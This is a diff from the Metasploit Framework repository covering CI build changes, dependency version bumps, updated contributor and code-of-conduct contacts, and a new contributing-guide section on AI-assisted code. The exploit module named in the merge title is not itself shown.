automatic module_metadata_base.json update

Merge pull request #20672 from h00die-gr3y/centreon_auth_rce
Centreon authenticated command injection leading to RCE via broker engine "reload" parameter [CVE-2025-5946]
2025-11-05 15:39:36 +00:00 · 2025-11-05 16:29:29 +01:00 · 2025-11-05 09:20:13 +00:00 · 2025-11-04 12:29:56 -06:00 · 2025-11-03 17:30:47 +00:00 · 2025-11-03 14:37:23 +00:00
930 changed files with 26305 additions and 6431 deletions
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
+          - '3.3'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -44,6 +44,7 @@ on:
      - 'Gemfile.lock'
      - 'data/templates/**'
      - 'modules/payloads/**'
+      - 'lib/msf/base/sessions/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
      - 'test/modules/**'
@@ -269,12 +269,26 @@ jobs:
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
-        shell: cmd
+        shell: pwsh
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          make.bat
+          Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
+          dir
+          $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
+          $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
+          $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
+          $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
+          if ($process.ExitCode -eq 0) {
+            Write-Host "components have been successfully added"
+          } else {
+            Write-Host "components were not installed"
+            exit 1
+          }
+          Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
+          Write-Host $r
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
+          Write-Host $r
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report it directly to
-caitlin_condon@rapid7.com or todb@metasploit.com.
+smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.

 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.
@@ -11,7 +11,7 @@ Before we get into the details of contributing code, you should know there are m
 - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
 - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
 - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
+ - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.


 ## Code Contributions
@@ -25,8 +25,10 @@ will be closed. We need to ensure the code we're adding to master is written to
 ## Expedited Module Creation Process
 We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.

-### Code Contribution Do's & Don'ts:
+## Vibecoding, AI, and LLM
+My first job had a token ring LAN and I still own a Win98SE CD, so I'm not entirely sure what _vibecoding_ is, but we're cool with any coding technique you use to create a PR as long as it is tested, documented, and does what it says it does.  Untested code is incomplete code, and incomplete code should be marked as a draft PR or WIP (Work in Progress) until it is complete, tested, and ready for a committer to review.  We have had several submissions clearly from AI that were well-formatted, looked really neat, and did nothing it said it did.  While we have no problem with AI-assisted coding, please do not assume that the code generated by an AI or LLM is logically or even syntactically correct.

+### Code Contribution Do's & Don'ts:
 Keeping the following in mind gives your contribution the best chance of landing!

 #### <u>Pull Requests</u>
@@ -42,7 +44,7 @@ Keeping the following in mind gives your contribution the best chance of landing
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** test your code.
+* **Do** test your code and submit the test output in your PR with any sensitive information removed.
 * **Do** list [verification steps] so committers can test your code.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
@@ -85,7 +87,7 @@ When reporting Metasploit issues:
 * **Don't** attempt to report issues on a closed PR.

 If you need some more guidance, talk to the main body of open source contributors over on our
-[Metasploit Slack] or [#metasploit on Freenode IRC].
+[GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) or [Metasploit Slack]

 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.78)
+    metasploit-framework (6.4.97)
      aarch64
      abbrev
      actionpack (~> 7.2.0)
@@ -21,6 +21,7 @@ PATH
      bson
      chunky_png
      csv
+      date (= 3.4.1)
      dnsruby
      drb
      ed25519
@@ -28,7 +29,7 @@ PATH
      em-http-request
      eventmachine
      faker
-      faraday (= 2.7.11)
+      faraday
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
@@ -45,9 +46,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.221)
+      metasploit-payloads (= 2.0.235)
      metasploit_data_models (>= 6.0.7)
-      metasploit_payloads-mettle (= 1.0.42)
+      metasploit_payloads-mettle (= 1.0.45)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -60,17 +61,18 @@ PATH
      network_interface
      nexpose
      nokogiri
-      octokit (~> 4.0)
+      octokit
      openssl-ccm
      openvas-omp
      ostruct
      packetfu
+      parallel
      patch_finder
      pcaprub
      pdf-reader
      pg
      puma
-      rack
+      rack (~> 2.2)
      railties
      rasn1 (= 0.14.0)
      rb-readline
@@ -95,19 +97,20 @@ PATH
      rex-struct2
      rex-text
      rex-zip
+      rexml (= 3.4.1)
      rinda
      ruby-macho
      ruby-mysql
      ruby_smb (~> 3.3.15)
      rubyntlm
      rubyzip
-      sinatra
+      sinatra (~> 3.2)
      sqlite3 (= 1.7.3)
      sshkey
      stringio (= 3.1.1)
      swagger-blocks
      syslog
-      thin
+      thin (~> 1.x)
      tzinfo
      tzinfo-data
      unix-crypt
@@ -126,9 +129,9 @@ GEM
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.2.2.1)
-      actionview (= 7.2.2.1)
-      activesupport (= 7.2.2.1)
+    actionpack (7.2.2.2)
+      actionview (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      nokogiri (>= 1.8.5)
      racc
      rack (>= 2.2.4, < 3.2)
@@ -137,19 +140,19 @@ GEM
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
      useragent (~> 0.16)
-    actionview (7.2.2.1)
-      activesupport (= 7.2.2.1)
+    actionview (7.2.2.2)
+      activesupport (= 7.2.2.2)
      builder (~> 3.1)
      erubi (~> 1.11)
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
-    activemodel (7.2.2.1)
-      activesupport (= 7.2.2.1)
-    activerecord (7.2.2.1)
-      activemodel (= 7.2.2.1)
-      activesupport (= 7.2.2.1)
+    activemodel (7.2.2.2)
+      activesupport (= 7.2.2.2)
+    activerecord (7.2.2.2)
+      activemodel (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      timeout (>= 0.4.0)
-    activesupport (7.2.2.1)
+    activesupport (7.2.2.2)
      base64
      benchmark (>= 0.3)
      bigdecimal
@@ -164,10 +167,10 @@ GEM
    addressable (2.8.7)
      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
-    allure-rspec (2.26.0)
-      allure-ruby-commons (= 2.26.0)
+    allure-rspec (2.27.0)
+      allure-ruby-commons (= 2.27.0)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.26.0)
+    allure-ruby-commons (2.27.0)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
@@ -203,38 +206,38 @@ GEM
      aws-sigv4 (~> 1.5)
    aws-sigv4 (1.11.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.2.0)
+    base64 (0.3.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
    benchmark (0.4.1)
-    bigdecimal (3.2.2)
+    bigdecimal (3.2.3)
    bindata (2.4.15)
    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (5.0.2)
+    bson (5.1.1)
    builder (3.3.0)
-    byebug (11.1.3)
+    byebug (12.0.0)
    chunky_png (1.4.0)
    coderay (1.1.3)
    concurrent-ruby (1.3.5)
-    connection_pool (2.5.3)
+    connection_pool (2.5.4)
    cookiejar (0.3.4)
    crass (1.0.6)
    csv (3.3.2)
    daemons (1.4.1)
    date (3.4.1)
-    debug (1.10.0)
+    debug (1.11.0)
      irb (~> 1.10)
      reline (>= 0.3.8)
    diff-lcs (1.6.2)
-    dnsruby (1.72.4)
-      base64 (~> 0.2.0)
-      logger (~> 1.6.5)
+    dnsruby (1.73.0)
+      base64 (>= 0.2)
+      logger (~> 1.6)
      simpleidn (~> 0.2.1)
    docile (1.4.1)
    domain_name (0.6.20240107)
    drb (2.2.3)
-    ed25519 (1.3.0)
+    ed25519 (1.4.0)
    elftools (1.3.1)
      bindata (~> 2)
    em-http-request (1.1.7)
@@ -246,12 +249,12 @@ GEM
    em-socksify (0.3.3)
      base64
      eventmachine (>= 1.0.0.beta.4)
-    erb (5.0.2)
+    erb (5.0.3)
    erubi (1.13.1)
    eventmachine (1.2.7)
-    factory_bot (6.5.4)
+    factory_bot (6.5.5)
      activesupport (>= 6.1.0)
-    factory_bot_rails (6.5.0)
+    factory_bot_rails (6.5.1)
      factory_bot (~> 6.5)
      railties (>= 6.1.0)
    faker (3.5.1)
@@ -298,7 +301,7 @@ GEM
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.10.2)
+    json (2.15.1)
    language_server-protocol (3.17.0.5)
    license_finder (5.11.1)
      bundler
@@ -309,7 +312,7 @@ GEM
      xml-simple
    lint_roller (1.1.0)
    little-plugger (1.1.4)
-    logger (1.6.6)
+    logger (1.7.0)
    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
@@ -326,7 +329,7 @@ GEM
      mutex_m
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.16)
+    metasploit-credential (6.0.19)
      bigdecimal
      csv
      drb
@@ -339,7 +342,7 @@ GEM
      railties
      rex-socket
      rubyntlm
-      rubyzip
+      rubyzip (< 3.0.0)
    metasploit-model (5.0.4)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
@@ -347,7 +350,7 @@ GEM
      drb
      mutex_m
      railties (~> 7.0)
-    metasploit-payloads (2.0.221)
+    metasploit-payloads (2.0.235)
    metasploit_data_models (6.0.9)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -358,12 +361,12 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.42)
+    metasploit_payloads-mettle (1.0.45)
    method_source (1.1.0)
-    mime-types (3.6.0)
+    mime-types (3.7.0)
      logger
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2025.0304)
+      mime-types-data (~> 3.2025, >= 3.2025.0507)
+    mime-types-data (3.2025.0924)
    mini_portile2 (2.8.9)
    minitest (5.25.5)
    mqtt (0.6.0)
@@ -387,12 +390,12 @@ GEM
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.18.9)
+    nokogiri (1.18.10)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
      bigdecimal
-    octokit (4.25.1)
+    octokit (10.0.0)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
    openssl-ccm (1.2.3)
@@ -402,7 +405,7 @@ GEM
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.27.0)
-    parser (3.3.8.0)
+    parser (3.3.9.0)
      ast (~> 2.4.1)
      racc
    parslet (1.8.2)
@@ -415,24 +418,24 @@ GEM
      ruby-rc4
      ttfunk
    pg (1.5.9)
-    pp (0.6.2)
+    pp (0.6.3)
      prettyprint
    prettyprint (0.2.0)
-    prism (1.4.0)
-    pry (0.14.2)
+    prism (1.5.1)
+    pry (0.15.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.10.1)
-      byebug (~> 11.0)
-      pry (>= 0.13, < 0.15)
+    pry-byebug (3.11.0)
+      byebug (~> 12.0)
+      pry (>= 0.13, < 0.16)
    psych (5.2.6)
      date
      stringio
-    public_suffix (6.0.1)
+    public_suffix (6.0.2)
    puma (6.6.0)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.17)
+    rack (2.2.19)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
@@ -450,9 +453,9 @@ GEM
    rails-html-sanitizer (1.6.2)
      loofah (~> 2.21)
      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
-    railties (7.2.2.1)
-      actionpack (= 7.2.2.1)
-      activesupport (= 7.2.2.1)
+    railties (7.2.2.2)
+      actionpack (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      irb (~> 1.13)
      rackup (>= 1.0.0)
      rake (>= 12.2)
@@ -463,13 +466,14 @@ GEM
    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    rdoc (6.14.2)
+    rdoc (6.15.0)
      erb
      psych (>= 4.0.0)
+      tsort
    recog (3.1.14)
      nokogiri
    redcarpet (3.6.1)
-    regexp_parser (2.10.0)
+    regexp_parser (2.11.3)
    reline (0.6.2)
      io-console (~> 0.5)
    require_all (3.0.0)
@@ -486,9 +490,11 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.41)
+    rex-exploitation (0.1.44)
+      bigdecimal
      jsobfu
      metasm
+      racc
      rex-arch
      rex-encoder
      rex-text
@@ -500,11 +506,12 @@ GEM
      rex-arch
    rex-ole (0.1.9)
      rex-text
-    rex-powershell (0.1.101)
+    rex-powershell (0.1.103)
+      bigdecimal
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.16)
+    rex-random_identifier (0.1.21)
      bigdecimal
      rex-text
    rex-registry (0.1.6)
@@ -530,7 +537,7 @@ GEM
      forwardable
      ipaddr
    rkelly-remix (0.0.7)
-    rspec (3.13.0)
+    rspec (3.13.1)
      rspec-core (~> 3.13.0)
      rspec-expectations (~> 3.13.0)
      rspec-mocks (~> 3.13.0)
@@ -542,7 +549,7 @@ GEM
    rspec-mocks (3.13.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (8.0.1)
+    rspec-rails (8.0.2)
      actionpack (>= 7.2)
      activesupport (>= 7.2)
      railties (>= 7.2)
@@ -552,7 +559,7 @@ GEM
      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.4)
+    rspec-support (3.13.6)
    rubocop (1.75.7)
      json (~> 2.3)
      language_server-protocol (~> 3.17.0.2)
@@ -564,7 +571,7 @@ GEM
      rubocop-ast (>= 1.44.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 4.0)
-    rubocop-ast (1.44.1)
+    rubocop-ast (1.47.1)
      parser (>= 3.3.7.2)
      prism (~> 1.4)
    ruby-macho (4.1.0)
@@ -616,15 +623,16 @@ GEM
    timeout (0.4.3)
    toml (0.2.0)
      parslet (~> 1.8.0)
+    tsort (0.2.0)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
    tzinfo-data (1.2025.1)
      tzinfo (>= 1.0.0)
-    unicode-display_width (3.1.4)
-      unicode-emoji (~> 4.0, >= 4.0.4)
-    unicode-emoji (4.0.4)
+    unicode-display_width (3.2.0)
+      unicode-emoji (~> 4.1)
+    unicode-emoji (4.1.0)
    unix-crypt (1.3.1)
    useragent (0.16.11)
    warden (1.2.9)
@@ -682,4 +690,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   2.5.10
+   2.5.22
@@ -2,15 +2,15 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 2.0.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.2.2.1, MIT
-actionview, 7.2.2.1, MIT
-activemodel, 7.2.2.1, MIT
-activerecord, 7.2.2.1, MIT
-activesupport, 7.2.2.1, MIT
+actionpack, 7.2.2.2, MIT
+actionview, 7.2.2.2, MIT
+activemodel, 7.2.2.2, MIT
+activerecord, 7.2.2.2, MIT
+activesupport, 7.2.2.2, MIT
 addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.26.0, "Apache 2.0"
-allure-ruby-commons, 2.26.0, "Apache 2.0"
+allure-rspec, 2.27.0, "Apache 2.0"
+allure-ruby-commons, 2.27.0, "Apache 2.0"
 arel-helpers, 2.16.0, MIT
 ast, 2.4.3, MIT
 aws-eventstream, 1.3.2, "Apache 2.0"
@@ -23,41 +23,41 @@ aws-sdk-kms, 1.99.0, "Apache 2.0"
 aws-sdk-s3, 1.182.0, "Apache 2.0"
 aws-sdk-ssm, 1.191.0, "Apache 2.0"
 aws-sigv4, 1.11.0, "Apache 2.0"
-base64, 0.2.0, "ruby, Simplified BSD"
+base64, 0.3.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
-benchmark, 0.4.0, "ruby, Simplified BSD"
-bigdecimal, 3.1.9, "ruby, Simplified BSD"
+benchmark, 0.4.1, "ruby, Simplified BSD"
+bigdecimal, 3.2.3, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
-bson, 5.0.2, "Apache 2.0"
+bson, 5.1.1, "Apache 2.0"
 builder, 3.3.0, MIT
-bundler, 2.5.10, MIT
-byebug, 11.1.3, "Simplified BSD"
+bundler, 2.5.22, MIT
+byebug, 12.0.0, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.3.4, MIT
-connection_pool, 2.5.0, MIT
+concurrent-ruby, 1.3.5, MIT
+connection_pool, 2.5.4, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
 date, 3.4.1, "ruby, Simplified BSD"
-debug, 1.10.0, "ruby, Simplified BSD"
-diff-lcs, 1.6.0, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
-dnsruby, 1.72.4, "Apache 2.0"
+debug, 1.11.0, "ruby, Simplified BSD"
+diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
+dnsruby, 1.73.0, "Apache 2.0"
 docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
-drb, 2.2.1, "ruby, Simplified BSD"
-ed25519, 1.3.0, MIT
+drb, 2.2.3, "ruby, Simplified BSD"
+ed25519, 1.4.0, MIT
 elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.3, MIT
-erb, 5.0.1, "ruby, Simplified BSD"
+erb, 5.0.3, "ruby, Simplified BSD"
 erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.1, MIT
-factory_bot_rails, 6.4.4, MIT
+factory_bot, 6.5.5, MIT
+factory_bot_rails, 6.5.1, MIT
 faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
@@ -78,33 +78,33 @@ http-cookie, 1.0.8, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.9.0, ruby
 i18n, 1.14.7, MIT
-io-console, 0.8.0, "ruby, Simplified BSD"
+io-console, 0.8.1, "ruby, Simplified BSD"
 ipaddr, 1.2.7, "ruby, Simplified BSD"
 irb, 1.15.2, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.10.2, ruby
+json, 2.15.1, ruby
 language_server-protocol, 3.17.0.5, MIT
 license_finder, 5.11.1, MIT
 lint_roller, 1.1.0, MIT
 little-plugger, 1.1.4, MIT
-logger, 1.6.6, "ruby, Simplified BSD"
+logger, 1.7.0, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
-loofah, 2.24.0, MIT
+loofah, 2.24.1, MIT
 lru_redux, 1.1.0, MIT
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
-metasploit-credential, 6.0.16, "New BSD"
-metasploit-framework, 6.4.78, "New BSD"
+metasploit-credential, 6.0.19, "New BSD"
+metasploit-framework, 6.4.97, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
-metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.235, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.9, "New BSD"
-metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.45, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
-mime-types, 3.6.0, MIT
-mime-types-data, 3.2025.0304, MIT
-mini_portile2, 2.8.8, MIT
+mime-types, 3.7.0, MIT
+mime-types-data, 3.2025.0924, MIT
+mini_portile2, 2.8.9, MIT
 minitest, 5.25.5, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
@@ -121,59 +121,59 @@ net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.18.3, MIT
+nokogiri, 1.18.10, MIT
 nori, 2.7.1, MIT
-octokit, 4.25.1, MIT
+octokit, 10.0.0, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
 parallel, 1.27.0, MIT
-parser, 3.3.8.0, MIT
+parser, 3.3.9.0, MIT
 parslet, 1.8.2, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.14.1, MIT
 pg, 1.5.9, "Simplified BSD"
-pp, 0.6.2, "ruby, Simplified BSD"
+pp, 0.6.3, "ruby, Simplified BSD"
 prettyprint, 0.2.0, "ruby, Simplified BSD"
-prism, 1.4.0, MIT
-pry, 0.14.2, MIT
-pry-byebug, 3.10.1, MIT
+prism, 1.5.1, MIT
+pry, 0.15.2, MIT
+pry-byebug, 3.11.0, MIT
 psych, 5.2.6, MIT
-public_suffix, 6.0.1, MIT
+public_suffix, 6.0.2, MIT
 puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.13, MIT
+rack, 2.2.19, MIT
 rack-protection, 3.2.0, MIT
 rack-session, 1.0.2, MIT
 rack-test, 2.2.0, MIT
 rackup, 1.0.1, MIT
-rails-dom-testing, 2.2.0, MIT
+rails-dom-testing, 2.3.0, MIT
 rails-html-sanitizer, 1.6.2, MIT
-railties, 7.2.2.1, MIT
+railties, 7.2.2.2, MIT
 rainbow, 3.1.1, MIT
-rake, 13.2.1, MIT
+rake, 13.3.0, MIT
 rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
-rdoc, 6.14.0, ruby
+rdoc, 6.15.0, ruby
 recog, 3.1.14, unknown
 redcarpet, 3.6.1, MIT
-regexp_parser, 2.10.0, MIT
-reline, 0.6.0, ruby
+regexp_parser, 2.11.3, MIT
+reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.18, "New BSD"
 rex-bin_tools, 0.1.10, "New BSD"
 rex-core, 0.1.34, "New BSD"
 rex-encoder, 0.1.8, "New BSD"
-rex-exploitation, 0.1.41, "New BSD"
+rex-exploitation, 0.1.44, "New BSD"
 rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
-rex-powershell, 0.1.101, "New BSD"
-rex-random_identifier, 0.1.16, "New BSD"
+rex-powershell, 0.1.103, "New BSD"
+rex-random_identifier, 0.1.21, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
 rex-socket, 0.1.62, "New BSD"
@@ -184,15 +184,15 @@ rex-zip, 0.1.6, "New BSD"
 rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.13.0, MIT
-rspec-core, 3.13.3, MIT
-rspec-expectations, 3.13.3, MIT
-rspec-mocks, 3.13.2, MIT
-rspec-rails, 8.0.0, MIT
+rspec, 3.13.1, MIT
+rspec-core, 3.13.5, MIT
+rspec-expectations, 3.13.5, MIT
+rspec-mocks, 3.13.5, MIT
+rspec-rails, 8.0.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.2, MIT
+rspec-support, 3.13.6, MIT
 rubocop, 1.75.7, MIT
-rubocop-ast, 1.44.1, MIT
+rubocop-ast, 1.47.1, MIT
 ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.2.0, MIT
 ruby-prof, 1.7.2, "Simplified BSD"
@@ -216,16 +216,17 @@ swagger-blocks, 3.0.0, MIT
 syslog, 0.3.0, "ruby, Simplified BSD"
 test-prof, 1.4.4, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.3.2, MIT
+thor, 1.4.0, MIT
 tilt, 2.6.0, MIT
 timecop, 0.9.10, MIT
 timeout, 0.4.3, "ruby, Simplified BSD"
 toml, 0.2.0, MIT
+tsort, 0.2.0, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2025.1, MIT
-unicode-display_width, 3.1.4, MIT
-unicode-emoji, 4.0.4, MIT
+unicode-display_width, 3.2.0, MIT
+unicode-emoji, 4.1.0, MIT
 unix-crypt, 1.3.1, 0BSD
 useragent, 0.16.11, MIT
 warden, 1.2.9, MIT
@@ -240,4 +241,4 @@ xdr, 3.0.3, "Apache 2.0"
 xml-simple, 1.1.9, MIT
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.37, MIT
-zeitwerk, 2.7.2, MIT
+zeitwerk, 2.7.3, MIT
@@ -18,7 +18,14 @@ Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapi
 For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

 ## Support and Communication
-For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.
+For questions and suggestions, you can:
+
+- Join our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) for community support and general questions
+- Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat
+- Submit [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) for bug reports and feature requests
+- Follow [@metasploit](https://x.com/metasploit) on X or [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit) on Mastodon for updates
+
+**Note:** Some community members may still use IRC channels and the metasploit-hackers mailing list, though the primary support channels are now GitHub Discussions and Slack.

 ## Installing Metasploit

